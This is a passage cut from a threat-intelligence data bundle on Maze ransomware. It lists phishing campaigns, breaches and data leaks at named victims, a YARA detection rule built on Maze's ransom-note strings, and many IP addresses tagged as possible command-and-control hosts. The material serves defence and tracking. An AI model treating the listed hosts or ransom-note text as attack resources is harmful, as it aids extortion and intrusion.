"description": "On November 6, 2019, Proofpoint researchers observed hundreds of emails attempting to deliver malicious Microsoft Word attachments with German lures, again impersonating the German Federal Ministry of Finance. As with the previous two campaigns, the actor used stolen branding as well as the use of lookalike .icu\ndomains used for the sender email address in order to craft effective lures. The malicious document purports to be an RSA SecurID key used by the German Ministry of Finance.\n\nOn November 7, 2019, Proofpoint researchers observed hundreds of emails attempting to deliver malicious Microsoft Word attachments with German lures, this time impersonating a German internet service provider, 1&1 Internet AG.",
"created": "2020-01-07T14:38:20.950Z",
"modified": "2020-01-07T14:40:47.449Z",
"x_opencti_id": "835859b1-0bb9-4ec5-b7d7-c37f28747a0b",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--82f427aa-7622-438f-9172-980fe432359c",
"type": "x-opencti-incident",
"name": "Incident Maze - Allied Universal",
"labels": [
"x-opencti-incident"
],
"description": "the group behind Maze Ransomware has published almost 700 MB worth of data and files stolen from security staffing firm Allied Universal.\nRansom amount asked : $2.3M",
"created": "2020-02-04T15:10:06.889Z",
"modified": "2020-02-04T15:10:06.889Z",
"x_opencti_id": "b268e4f0-e820-49c7-b441-015c543db252",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--4707c654-4876-4897-9a3a-eae84858e199",
"type": "x-opencti-incident",
"name": "Incident Maze - Southwire",
"labels": [
"x-opencti-incident"
],
"description": "Southwire, a leading wire and cable manufacturer from Carrollton, Georgia, was attacked in December 2019. As part of this attack, the ransomware allegedly stole 120GB of data and encrypted 878 devices.\nAfter a ransom of 850 bitcoins, or $6 million. was not paid by Southwire, the Maze operators published a portion of their stolen data on a \"news\" site that the threat actors created.",
"created": "2020-01-08T16:03:47.168Z",
"modified": "2020-01-08T16:03:47.168Z",
"x_opencti_id": "ff44ba3e-2409-42b9-b523-24a70e1176ae",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--b0c526ac-b80a-4e61-87bf-85f0826923b3",
"type": "x-opencti-incident",
"name": "Incident Maze - City of Pensacola",
"labels": [
"x-opencti-incident"
],
"description": "The City of Pensacola was hit in december 2019 with a Maze ransomware attack that impacted the city's email service, some phone service, and caused them to shut down their computer systems.\nThreat actors demanded a $1 million ransom and released the 23rd december 2gb of files that they state they stole from the city before encrypting the network.",
"created": "2020-01-08T16:00:35.328Z",
"modified": "2020-01-08T16:00:35.328Z",
"x_opencti_id": "09c0f17d-4276-4a24-9b32-acf777ba6af4",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"type": "campaign",
"name": "Italy - Maze - October 2019",
"labels": [
"campaign"
],
"description": "On October 29, Proofpoint researchers observed dozens of emails\nattempting to deliver malicious Microsoft Word attachments with\nItalian lures impersonating the Agenzia Entrate, the Italian Ministry\nof Taxation. As with the initially observed German campaign, the\nactor has used stolen branding as well as lookalike.icu domains\nused for the sender email address in order to craft effective lures.",
"created": "2020-01-07T14:34:49.221Z",
"modified": "2020-01-07T14:34:49.221Z",
"x_opencti_id": "b0ac41fa-ef97-462e-a90a-74e97b8be36b",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--580a4759-8c15-4e97-b1a5-11045d4d8d24",
"type": "x-opencti-incident",
"name": "Incident Maze - Fratelli Beretta",
"labels": [
"x-opencti-incident"
],
"description": "The Italian foods company Fratelli Beretta saw all the data exfiltrated from 53 systems (a total of 3GB) posted online by Maze in december 2019.",
"created": "2020-02-04T15:24:17.831Z",
"modified": "2020-02-04T15:25:13.215Z",
"x_opencti_id": "b57e5c0d-0b3e-41d9-8155-b045736f47f4",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--ed46cbe3-506f-47ae-9ab8-94f22edd699a",
"type": "x-opencti-incident",
"name": "Incident Maze - Stockdale radiology",
"labels": [
"x-opencti-incident"
],
"description": "Databreaches : Stockdale Radiology is one of the medical entities Maze Team had informed me about previously and had sent me a sample of patient files from.",
"created": "2020-02-04T15:30:14.480Z",
"modified": "2020-02-04T15:30:14.480Z",
"x_opencti_id": "dd843665-374a-4f2c-a2fc-70f850a2fc95",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--8f2b5860-e9ab-4268-ace2-35b335578d2f",
"type": "x-opencti-incident",
"name": "Incident Maze - Lakeland Community College",
"labels": [
"x-opencti-incident"
],
"description": "Databreaches : Lakeland Community College in Ohio also became a victim,\nit seems. Their data were reportedly locked on January 12 and 19 GB of data were allegedly downloaded. There is no notice on the college\u2019s site as of today, and the proof file is not linked to a working file.",
"created": "2020-02-04T15:37:05.236Z",
"modified": "2020-02-04T15:37:05.236Z",
"x_opencti_id": "fab78d2b-3759-4c12-940b-7814aa78aec7",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--d32b3420-3309-4d77-b4bf-285d9f6fd883",
"type": "x-opencti-incident",
"name": "Incident Maze - Medical Diagnostic Laboratories",
"labels": [
"x-opencti-incident"
],
"description": "databreaches : Medical Diagnostic Laboratories, LLC (MDL or MDLab) had already had some of their data dumped by Maze Team. They now appear to have had more of their files dumped. There is no announcement or notice on their website that might inform patients of any problem or data theft and there is no notice from the listed on HHS\u2019s public breach tool at this time.",
"created": "2020-02-04T15:42:17.018Z",
"modified": "2020-02-04T15:44:22.169Z",
"x_opencti_id": "f9abec3e-0531-4be4-a91e-f2ff6fd9c26b",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"type": "campaign",
"name": "US - Maze - November 2019",
"labels": [
"campaign"
],
"description": "On November 12, 2019, Proofpoint researchers observed thousands of emails attempting to deliver malicious Microsoft Word attachments with English lures, this time impersonating the United States Postal Service (USPS) and distributing the IcedID banking Trojan.",
"created": "2020-01-07T14:46:13.671Z",
"modified": "2020-01-07T14:46:13.671Z",
"x_opencti_id": "a70839c5-e68b-4d03-bd51-916e42ac9e79",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--ec987884-bbe1-4407-93aa-8225d2b1feae",
"type": "x-opencti-incident",
"name": "Incident Maze - Hamilton and Naumes",
"labels": [
"x-opencti-incident"
],
"description": "Databreaches : They have also attacked a law firm in Oregon: Hamilton and Naumes, LLC. That attack took place on January 16, and there are no proof files uploaded as of today\u2019s date, but if they were able to get everything, then there may well be a lot of sensitive files as the firm\u2019s areas of practice include family law, juvenile law, and criminal defense.",
"created": "2020-02-04T15:46:27.942Z",
"modified": "2020-02-04T15:46:27.942Z",
"x_opencti_id": "8c9ae84e-6f6a-4414-aca0-7159260e359f"
},
{
"id": "incident--c8f661b6-967f-40f5-9f3d-d51a9b2fbee7",
"type": "x-opencti-incident",
"name": "Incident Maze - Bird Construction",
"labels": [
"x-opencti-incident"
],
"description": "General contractor Bird Construction, which is based in Toronto, was allegedly targeted by cyber-threat group MAZE in December 2019. MAZE claims to have stolen 60 GB of data from the company.",
"created": "2020-02-04T15:52:16.845Z",
"modified": "2020-02-04T15:52:16.845Z",
"x_opencti_id": "725af09e-714a-45a8-8c38-9aec63b7c3f3",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "campaign--2f94c044-1f99-4ecd-b3e4-2ac55aa8752d",
"type": "campaign",
"name": "Campaign - Maze - pre-october 2019",
"labels": [
"campaign"
],
"description": "Maze was known to be delivered by exploit kit (Fallout and Spelevo).",
"created": "2020-02-04T14:47:29.010Z",
"modified": "2020-02-04T14:47:29.010Z",
"x_opencti_id": "a0ab295e-7da9-4eb1-8b77-10a956895038",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--b18649a4-b77c-4f50-838d-5aca5fb727ba",
"type": "x-opencti-incident",
"name": "Incident Maze - Bouygues Construction",
"labels": [
"x-opencti-incident"
],
"description": "Bouygues Construction has been compromised by Maze ransomware the 30th january 2020. Threat Actor asked for 10 millions dollars for decryption and leaked a list of computers exposed on Internet.",
"created": "2020-02-04T14:26:38.377Z",
"modified": "2020-02-04T14:32:50.335Z",
"x_opencti_id": "d43a1099-26bf-4fa0-ac36-3a22271c4284",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--996222f5-b03f-4055-9265-34bbfe9e95a4",
"type": "x-opencti-incident",
"name": "Incident Maze - Andrew Agencies",
"labels": [
"x-opencti-incident"
],
"description": "Maze Threat Actor claimed Andrew Agencies was attacked on October 21st, 2019 when they breached their network and encrypted 245 computers.",
"created": "2020-02-04T15:04:05.991Z",
"modified": "2020-02-04T15:04:05.991Z",
"x_opencti_id": "95ecd5fe-d3bc-4f8d-90c9-ddc077ab38c6",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--acc94099-0037-405e-9763-69fd0c2f1839",
"type": "indicator",
"name": "Maze rule",
"labels": [
"indicator"
],
"pattern": "rule Maze\n{\nmeta:\n\tdescription = \"Identifies Maze ransomware in memory or unpacked.\"\n\tauthor = \"@bartblaze\"\n\tdate = \"2019-11\"\n\ttlp = \"White\"\n\nstrings:\t\n\t$ = \"Enc: %s\" ascii wide\n\t$ = \"Encrypting whole system\" ascii wide\n\t$ = \"Encrypting specified folder in --path parameter...\" ascii wide\n\t$ = \"!Finished in %d ms!\" ascii wide\n\t$ = \"--logging\" ascii wide\n\t$ = \"--nomutex\" ascii wide\n\t$ = \"--noshares\" ascii wide\n\t$ = \"--path\" ascii wide\n\t$ = \"Logging enabled | Maze\" ascii wide\n\t$ = \"NO SHARES | \" ascii wide\n\t$ = \"NO MUTEX | \" ascii wide\n\t$ = \"Encrypting:\" ascii wide\n\t$ = \"You need to buy decryptor in order to restore the files.\" ascii wide\n\t$ = \"Dear %s, your files have been encrypted by RSA-2048 and ChaCha algorithms\" ascii wide\n\t$ = \"%s! Alert! %s! Alert! Dear %s Your files have been encrypted by %s! Attention! %s\" ascii wide\n\t$ = \"DECRYPT-FILES.txt\" ascii wide fullword\n\ncondition:\n\t5 of them\n}",
"valid_from": "2020-02-05T09:12:00.000Z",
"valid_until": "2021-02-04T09:12:00.000Z",
"x_opencti_pattern_type": "yara",
"created": "2020-02-05T09:18:39.097Z",
"modified": "2020-02-05T09:18:39.097Z",
"x_opencti_id": "882eece0-0a2d-4308-af27-3b50dc794131"
},
{
"id": "indicator--8895042c-7c13-4d86-a4de-6e8b560a0519",
"type": "indicator",
"name": "104.168.198.230",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '104.168.198.230']",
"valid_from": "2020-02-05T10:00:22.262Z",
"valid_until": "2021-02-04T10:00:22.262Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:00:23.146Z",
"modified": "2020-02-05T10:00:23.146Z",
"x_opencti_id": "5c71fd50-3989-4a2b-8c2b-a25515adbfa3",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--5b4eca1f-a30c-420c-845a-4f089934dcf2",
"type": "indicator",
"name": "104.168.198.208",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '104.168.198.208']",
"valid_from": "2020-02-05T10:00:19.903Z",
"valid_until": "2021-02-04T10:00:19.903Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:00:20.802Z",
"modified": "2020-02-05T10:00:20.802Z",
"x_opencti_id": "9f32bb2e-0f75-47d9-88d4-1923e538b9e4",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--783d7b92-5209-4bd5-844b-d594b6efda1c",
"type": "indicator",
"name": "104.168.174.32",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '104.168.174.32']",
"valid_from": "2020-02-05T09:59:22.234Z",
"valid_until": "2021-02-04T09:59:22.234Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T09:59:23.216Z",
"modified": "2020-02-05T09:59:23.216Z",
"x_opencti_id": "f2f46567-5d11-4af4-851f-81aa2a0f9073",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--94b5c744-b156-4208-ab8d-e28e1ec56eb9",
"type": "indicator",
"name": "104.168.215.54",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '104.168.215.54']",
"valid_from": "2020-02-05T10:00:24.565Z",
"valid_until": "2021-02-04T10:00:24.565Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:00:25.512Z",
"modified": "2020-02-05T10:00:25.512Z",
"x_opencti_id": "d23c7c16-70d4-40e6-a652-9df274007131",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--6cf4aa42-fe72-4cb8-a91d-c54b09533a8d",
"type": "indicator",
"name": "108.174.199.10",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '108.174.199.10']",
"valid_from": "2020-02-05T10:04:46.484Z",
"valid_until": "2021-02-04T10:04:46.484Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:04:47.374Z",
"modified": "2020-02-05T10:04:47.374Z",
"x_opencti_id": "e0488d1d-a872-4a82-9f14-d408ec468774",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--48e335bc-734e-4bcb-b364-f24407be5ece",
"type": "indicator",
"name": "185.147.15.22",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '185.147.15.22']",
"valid_from": "2020-02-05T10:04:49.238Z",
"valid_until": "2021-02-04T10:04:49.238Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:04:50.122Z",
"modified": "2020-02-05T10:04:50.122Z",
"x_opencti_id": "f669ccd2-d5f8-4544-a8a3-b09845e73768",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--ab041af1-0ba0-4c62-b020-fcb43c0c42dc",
"type": "indicator",
"name": "192.119.106.135",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '192.119.106.135']",
"valid_from": "2020-02-05T10:04:51.926Z",
"valid_until": "2021-02-04T10:04:51.926Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:04:52.855Z",
"modified": "2020-02-05T10:04:52.855Z",
"x_opencti_id": "ea0bd5e6-0dd3-4582-ab6b-81bf69923bd3",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--2deec89a-2cf2-47b8-9fae-89a456d834d5",
"type": "indicator",
"name": "192.119.68.225",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '192.119.68.225']",
"valid_from": "2020-02-05T10:04:54.826Z",
"valid_until": "2021-02-04T10:04:54.826Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:04:55.765Z",
"modified": "2020-02-05T10:04:55.765Z",
"x_opencti_id": "4013a3c4-2f41-4879-a889-adfa2226294b",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--3a0ab761-cca4-4aec-b127-b103d978b7ed",
"type": "indicator",
"name": "192.236.210.142",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '192.236.210.142']",
"valid_from": "2020-02-05T10:04:57.665Z",
"valid_until": "2021-02-04T10:04:57.665Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:04:58.693Z",
"modified": "2020-02-05T10:04:58.693Z",
"x_opencti_id": "c02b5af3-6cd4-4920-892e-d9217e7ad432",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--dc5ead57-a56d-4a7c-b477-bf33c5828615",
"type": "indicator",
"name": "198.50.168.67",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '198.50.168.67']",
"valid_from": "2020-02-05T10:05:00.709Z",
"valid_until": "2021-02-04T10:05:00.709Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:01.628Z",
"modified": "2020-02-05T10:05:01.628Z",
"x_opencti_id": "14b23d2a-1cf9-4220-80ac-0a0eac87d2ac",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--6e479260-bd34-45c4-802f-a236533127f0",
"type": "indicator",
"name": "5.199.167.188",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '5.199.167.188']",
"valid_from": "2020-02-05T10:05:03.825Z",
"valid_until": "2021-02-04T10:05:03.825Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:04.888Z",
"modified": "2020-02-05T10:05:04.888Z",
"x_opencti_id": "eff25a89-e31d-4e7e-b3e2-4333a2928305",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--8477d190-01fa-42d0-8c25-c6cb7b62e42a",
"type": "indicator",
"name": "54.39.233.131",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '54.39.233.131']",
"valid_from": "2020-02-05T10:05:06.759Z",
"valid_until": "2021-02-04T10:05:06.759Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:07.831Z",
"modified": "2020-02-05T10:05:07.831Z",
"x_opencti_id": "595a9e9c-ad80-4f78-b441-f34585aa9464",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--07caf8e2-b8d1-43f3-a3f8-226ac17e604b",
"type": "indicator",
"name": "54.39.233.175",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '54.39.233.175']",
"valid_from": "2020-02-05T10:05:09.874Z",
"valid_until": "2021-02-04T10:05:09.874Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:10.825Z",
"modified": "2020-02-05T10:05:10.825Z",
"x_opencti_id": "40dc5b4b-1530-4d79-a7b5-0a7b670487e3",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--699fa50b-7154-4581-b5c4-cd62d8c04a7d",
"type": "indicator",
"name": "91.218.114.11",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.11']",
"valid_from": "2020-02-05T10:05:12.637Z",
"valid_until": "2021-02-04T10:05:12.637Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:13.537Z",
"modified": "2020-02-05T10:05:13.537Z",
"x_opencti_id": "017ccfd2-0c45-4545-b8c5-297a572a6477",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--d0fe5c47-c5e9-4bbe-bc4f-937ebd16fcac",
"type": "indicator",
"name": "91.218.114.25",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.25']",
"valid_from": "2020-02-05T10:05:15.383Z",
"valid_until": "2021-02-04T10:05:15.383Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:16.248Z",
"modified": "2020-02-05T10:05:16.248Z",
"x_opencti_id": "b00d476e-04d3-4433-9e85-b1396c25fc64",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--af485c23-5498-400b-ba25-e05a9a3a0198",
"type": "indicator",
"name": "91.218.114.26",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.26']",
"valid_from": "2020-02-05T10:05:18.084Z",
"valid_until": "2021-02-04T10:05:18.084Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:19.186Z",
"modified": "2020-02-05T10:05:19.186Z",
"x_opencti_id": "027e5f0c-bcb5-43f3-a877-f45b3cb78caf",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--614df552-e5e7-44b1-b473-22efdf5a1546",
"type": "indicator",
"name": "91.218.114.31",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.31']",
"valid_from": "2020-02-05T10:05:21.078Z",
"valid_until": "2021-02-04T10:05:21.078Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:22.066Z",
"modified": "2020-02-05T10:05:22.066Z",
"x_opencti_id": "fa0766e7-718a-459b-bbfd-74494abad0cc",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--2442e818-ac39-4876-aaa0-bf0019f4b27b",
"type": "indicator",
"name": "91.218.114.32",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.32']",
"valid_from": "2020-02-05T10:05:23.894Z",
"valid_until": "2021-02-04T10:05:23.894Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:24.934Z",
"modified": "2020-02-05T10:05:24.934Z",
"x_opencti_id": "ca2e5139-2219-41ef-98d0-c8106ab6e0be",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--f6ab57d7-06b3-4980-b6d0-8a4364eb5dd4",
"type": "indicator",
"name": "91.218.114.37",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.37']",
"valid_from": "2020-02-05T10:05:26.732Z",
"valid_until": "2021-02-04T10:05:26.732Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:27.624Z",
"modified": "2020-02-05T10:05:27.624Z",
"x_opencti_id": "a5bff540-0fcd-4c16-98db-ab257490f48c",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--dcaa1087-87d2-410a-83aa-90c936afe3e4",
"type": "indicator",
"name": "91.218.114.38",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.38']",
"valid_from": "2020-02-05T10:05:29.479Z",
"valid_until": "2021-02-04T10:05:29.479Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:30.577Z",
"modified": "2020-02-05T10:05:30.577Z",
"x_opencti_id": "24b8c018-62d6-448a-a90c-22d51238d86e",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--4eef17b7-4ba6-46bc-8ed7-1a29826cf7b2",
"type": "indicator",
"name": "91.218.114.4",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.4']",
"valid_from": "2020-02-05T10:05:32.391Z",
"valid_until": "2021-02-04T10:05:32.391Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:33.449Z",
"modified": "2020-02-05T10:05:33.449Z",
"x_opencti_id": "d92a768b-489d-4efa-b6f5-e0d51b5ed4b2",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--4a642ed5-f664-410a-b9b9-e7f0ab65bd18",
"type": "indicator",
"name": "91.218.114.77",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.77']",
"valid_from": "2020-02-05T10:05:35.899Z",
"valid_until": "2021-02-04T10:05:35.899Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:36.860Z",
"modified": "2020-02-05T10:05:36.860Z",
"x_opencti_id": "f9a3c7db-da7c-49eb-9208-7e83caabb5ee",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--7ca5ea6e-34a9-40cc-a4d8-61095f05777f",
"type": "indicator",
"name": "91.218.114.79",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.79']",
"valid_from": "2020-02-05T10:05:39.060Z",
"valid_until": "2021-02-04T10:05:39.060Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:39.947Z",
"modified": "2020-02-05T10:05:39.947Z",
"x_opencti_id": "529e8fc9-36fc-46a0-8112-c7c5b15d6558",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"type": "malware",
"name": "Maze",
"labels": [
"malware"
],
"description": "Ransomware discovered in may 2019, also know as ChaCha ransomware, and used in multiple attacks assorted with improtant ransom (millions of dollars). Maze could be distributed as a Ransomware-As-A-Service and is operated by at least one group, TA2101, specialized in Big Game Hunting attacks. Attacks with Maze often include exfitration and leak of internal datas as a mean to force victims to pay.",
"created": "2020-01-07T14:32:28.160Z",
"modified": "2020-02-04T14:23:43.027Z",
"x_opencti_id": "ad30c082-466b-4121-b175-9b90516797a2",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--4d3eb24a-9f23-48a8-9282-ec2987012725",
"type": "indicator",
"name": "92.63.11.151",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.11.151']",
"valid_from": "2020-02-05T10:05:41.908Z",
"valid_until": "2021-02-04T10:05:41.909Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:43.205Z",
"modified": "2020-02-05T10:05:43.205Z",
"x_opencti_id": "8e021cff-aee9-48cf-b743-dab24853d545",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--da8c1488-3d95-44b6-9f56-03f9ab80a697",
"type": "indicator",
"name": "92.63.15.56",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.15.56']",
"valid_from": "2020-02-05T10:05:47.546Z",
"valid_until": "2021-02-04T10:05:47.546Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:48.532Z",
"modified": "2020-02-05T10:05:48.532Z",
"x_opencti_id": "45d92f72-a4a1-43c0-88ff-802c0e44a2fa",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--d7519fd7-a6f1-4c05-86b6-39397c61c5b5",
"type": "indicator",
"name": "92.63.15.6",
